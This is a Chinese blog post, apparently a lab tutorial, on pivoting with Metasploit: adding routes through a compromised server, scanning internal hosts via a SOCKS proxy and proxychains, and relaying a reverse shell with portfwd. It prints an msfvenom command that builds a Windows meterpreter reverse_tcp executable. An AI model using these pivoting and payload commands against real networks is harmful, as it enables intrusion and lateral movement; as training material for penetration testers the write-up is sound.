msf 代理和转发

最新推荐文章于 2024-01-19 17:29:14 发布
最新推荐文章于 2024-01-19 17:29:14 发布
阅读量5.3k 收藏 10
点赞数 1
分类专栏: 内网渗透 文章标签: 安全 msf 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qingzhantianxia/article/details/123429286
版权
简介

本篇文章主要是关于msf框架的实战内容,主要是关于代理,中继的内容的

网络拓扑图如下

在这里插入图片描述

根据网络拓扑,目标公司公网上暴露着一台服务器,然后内部还有两台服务器,但是不能出网,也无法直接访问到,防火墙对于进站规则限制严格,仅允许访问80,443端口,对于A服务器的出站不做限制。

以下的实验是基于这种前提:我们已经拿下了服务器的权限,并且成功反弹shell的情况下,将实验msf在以下三种跨网段的使用

  • 添加路由
  • 端口转发
  • 反向代理

添加路由 ,适用于初始的跨网段代理

端口转发,适用于访问特定目标的代理

反向中继, 需要通过特定的服务器才能反射出来。

实验

首先我们可以通过ifconfig之类的命令以及其他模块得知服务器拥有两块网卡,可以访问两个网段,我们首先可以使用主机发现的模块对两个网段中的存活主机进行探测

post/windows/gather/arp_scanner 可以跨网段使用的arp ,设置session ,这里的254和255两个IP应该是因为虚拟环境的原因才存在的,

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

然后添加路由,这样msf框架中的模块就可以直接访问到之前访问不到的地址了,最后一个值是sessions ID

在这里插入图片描述

在这里插入图片描述

192.168.74.133和192.168.74.141是我们计划攻击的主机,在完成主机探测之后,进行端口存活探测。可以使用tcp的端口扫描模块来进行扫描。

在这里插入图片描述

在这里插入图片描述

也可以设置socket 代理结合proxychains使用msf的外部攻击进行探测。

修改proxychains的配置 配置文件位置 /etc/proxychains.conf, 其中的端口要与msf 中的模块的端口设置相同
在这里插入图片描述

使用proxychains代理nmap 进行扫描。

在这里插入图片描述

使用攻击模块,直接获取192.168.220.133的shell,这个metasploit的靶机,所以很简单

在这里插入图片描述

可以看到他是通过session的隧道生成的新的session

中继

我们让服务器C反向链接攻击机,但是由于服务器C 无法直接访问攻击机,所以需要通过服务器A进行中继

首先攻击机设置handler监听,这里监听的是5555端口

在这里插入图片描述

在session1 中设置端口转发

portfwd -R -L 192.168.220.129 -l 5555 -p 6666

生成对应的木马

在这里插入图片描述

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.74.140 LPORT=6666 -f exe -o /root/22.exe

运行木马可以成功让机器上线

在这里插入图片描述

参考

https://medium.com/axon-technologies/how-to-implement-pivoting-and-relaying-techniques-using-meterpreter-b6f5ec666795

烟雨醉沉浮
关注
  • 1
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
MSF配置代理转发
j13373960206的博客
07-13 649
现在可以将主机1 设置成代理转发模式,也就是ms将数据包发送给主机1 ,主机1 再将数据包发送给主机2 ,以此来完成控制主机2。1、getsystem创建一个新的Windows服务,设置为SYSTEM运行,当它启动时连接到一个命名管 道。2、getsystem产生一个进程,它创建一个命名管道并等待来自该服务的连接。此时在msf主机2之间有主机1 ,而且主机1 已经被我们所控制(成功上线)2、修改配置文件,指定使用kail中的配置的代理服务。在被入侵的主机上,执行后门后,此时会发现上线成功。
利用MSF设置代理
Continuejww的博客
11-10 838
通过MSF拿到一个机器的权限后,通过MSF搭建socks代理,然后通内网。拿到目标权限,有很多方法,比如:①ms17-010 ②补丁漏洞 ③MSF生成后门在此直接使用MSF生成后门MSF中有三个代理模块,分别是socks4a、socks5、socks_unc。一般用 socks4a和socks5进行代理,socks5可以设置用户名和密码;新版本的MSF已经整合了socks代理,在模块中模块中直接设置。
php-msf源码详解
10-18
主要介绍了php-msf源码的意思以及用法相关问题,有需要的朋友跟着参考学习下吧。
通信与网络中的MSF基于组件的业务框架
11-14
MSF定义的基于组件的业务框架如图所示。该框架包括业务组件和业务代理两大主要功能。业务组件是捆绑或集成在一起的多个业务对象,用来创建销售给用户的业务,有三种类型的业务组件。   图 MSF基于组件的业务框架   (1)应用层业务组件(ASC)   这些组件通常与应用服务器有关,通过信令访问,由一系列输入输出交互准则定义。例如,基于SIP的业务交互中,相关ASC必须理解发送或接收的不同SIP消息中特定的参数。   (2)媒体服务组件(MSC)   MSC用于与媒体通路的交互,MSC大多与媒体服务器有关,包括一些功能如文本到语音的转化、交互式语音识别系统、会议桥等。   (3)数据
项目管理利刃之MSF
03-03
火龙果软件工程技术中心  MSF,MicrosoftSolutionFramework,微软解决方案框架是一个在预算范围内按期创建一个业务解决方案需要一种经过检验的方法。本文将结合MSF在项目管理中的实际应用进行讲解,如果您是软件项目的参与者,如项目经理、开发工程师、系统架构师、顾问、质量管理人员等,想找到项目管理中遇到问题的解决方案,相信本文会给您一定的帮助。MSF为成功地规划、设计、开发和部署IT解决方案提供了一套成熟的方法论。与具有固定框架的方法相反,MSF提供了一个可以伸缩的灵活框架,以满足任何规模的组织或者项目开发团队的需要。MSF指导由原理、模型和用来管理人员、项目和技术元素的准则
msf windows版
09-22
msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版
msf开发者文档
09-28
此为msf开发文档,项移植应用msf可以阅读。msf采用ruby编写。
端口转发1:通过MSF实现
da_chuan_chuan的博客
01-03 5433
文章目录前言一、生成MSF后门程序并上线二、使用portfwd实现端口转发1、端口转发前测试远程连接和数据库连接是否成功2、进行端口映射总结 前言 在内网渗透过程中,实现端口转发是十分重要的一步。如:我们要进行远程连接,但是它只允许内网主机连接;将内网访问的网站转发出来,实现外网可以访问。要解决这些情况我们都可以通过端口转发来解决,我们可以把内网端口转发到出网的端口上,也可以把端口转发到我们的 VPS主机上。下面以Windows2008服务器为目标服务器 ,以Ubantu为VPS主机。这里为了 方便假设我
MSF内网穿透之端口转发
weixin_46686336的博客
11-09 229
内网穿透之端口映射
内网渗透——Metasploit的代理转发
m0_65544268的博客
07-10 595
计算机配置==》管理模块==》网络==》Lanman工作站==》启用不安全的来宾登录。7)使用proxychains4测试访问主机2上的IIS。win10/11有可能没有打开服务,导致无法访问共享。lhost: 0.0.0.0 指定主机2本机地址。3)被攻击主机1运行生成的1111.exe文件。这样我们就实现了第一个主机上线的过程了。2)在已经上线的主机1上创建代理转发功能。出现这样的页面就说明添加路由成功了。这样我们就实现了三台主机上线了。10)主机2运行2222.exe。
kali 渗透msf
11-14
kali渗透测试利器
内网渗透-msf及socks代理转发
baynk的博客
05-29 8496
0x00 学习环境 拓扑如上,现在已经拥有了WIN2008的meterpreter权限 希望通过此主机进行代理转发,从而使msf能够攻击WIN7从而拿到权限。 0x01 路由转发1 先在meterpreter中使用route进行查看WIN2008所在的网段信息 通过background回到msf,使用route增加对应路由route add 172.16.10.0 255.255.255.0 1,1是挂起的session编号。 可以看到已经有路由了,用ms17-010打win7也可以成功拿到she
Viper+MSF:靶机代理转发上线学习
一只爱吃橙子的羊
02-12 1181
Viper+MSF:靶机代理转发上线学习
内网渗透-做代理流量转发-msf跨网段攻击(添加路由表)-Windows中ew和proxifier做代理-kali中ew和proxychains4做代理
BING
05-17 2179
0x01代理-windows中ew和proxifier 1.在靶机上上传ew 然后输入下面命令运行,正向代理 ew_for_windows.exe -s sscoked -l 8000 2.在windows启用proxifier,添加服务器,输入靶机上的ip和端口 3.设置代理规则 第一步截图: 第二步截图: 第三步截图: 你可以使用代理了 0x02代理-kali中ew和proxychains4做代理 1.在靶机上上传ew 然后输入下面命令运行,正向代理 ew_for_windows.exe -s
MSF开启socks代理内网渗透
The current road is different, love needs to distinguish between right and wrong
04-25 5623
简介 当我们通过MSF拿到一个机器的权限后,想通过MSF搭建socks代理,然后通内网。 MSF中有三个代理模块,分别是socks4a、socks5、socks_unc。一般用 socks4a和socks5进行代理,socks5可以设置用户名和密码;现在新版本的kali已经整合了socks代理。 测试环境 kali: 192.168.95.128 windows7: 192.168.95.169 ; 192.168.70.3 server2012: 192.168.70.2
论后渗透MSF之 | 添加路由和代理
一醉一休的博客
09-08 6481
内网中添加路由主要是`充当跳板`功能, 其实是MSF框架中自带的一个路由转发功能,其实现过程就是MSF框架在已经获取的meterpreter shell的基础上`添加一条去往内网的路由`,此路由的下一跳转发,即网关,是MSF攻击平台与被攻击目标建立的一个session会话
内网渗透-msf路由转发与端口转发
她叫常玉莹
08-11 2436
测试环境路由转发端口转发 在渗透的过程中常常会遇到这种场景:我们已经通过web渗透拿下一台内网服务器,为了进一步进行内网渗透,我们会利用“沦陷主机”作为跳板进行进一步的内网渗透,扩大战果。端口转发的主要目的是帮助我们能够访问不在于同一网段上的系统上的特定端口。 测试环境 攻击机kali ip:192.168.0.110 中转win7 ip:192.168.0.130 目标机server 2003 ip:192.168.6.128 路由转发 msfvenom生成payload,使用msf获得session .
内网渗透之Msf-Socks代理实战(CFS三层靶场渗透过程及思路)
热门推荐
不知名白帽的博客
09-18 1万+
内网渗透之Msf-Socks代理实战(CFS三层靶场渗透过程及思路)
MSF横向拓展(流量代理,端口代理转发)--详细教程
最新发布
qq_41245301的博客
01-19 512
命令进行路由跟踪发现走了我的真实机的vmnet8网卡,我们在kail中把vmnet8的网卡的网关删除掉(需要连外网时记得添加回来route add default gw 192.168.138.2),再ping时发现已经网络不可达了,实验环境就可以了。原理:因为之前环境已经实现了通过msf可以访问到内网主机的功能,我们现在通过server/socks_proxy模块实现让指定的流量走msf创建的路由到达内网主机实现代理。可以实现代理,我们可以发现当我们使用代理时是不能连接到内网主机的,当我们加上。
msf 指定session代理
06-06
你可以使用 `setg Proxies` 命令来设置 Metasploit Framework 中的所有会话的代理。例如,如果你想要将所有会话的代理设置为 `http://127.0.0.1:8080`,你可以使用以下命令: ``` setg Proxies ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值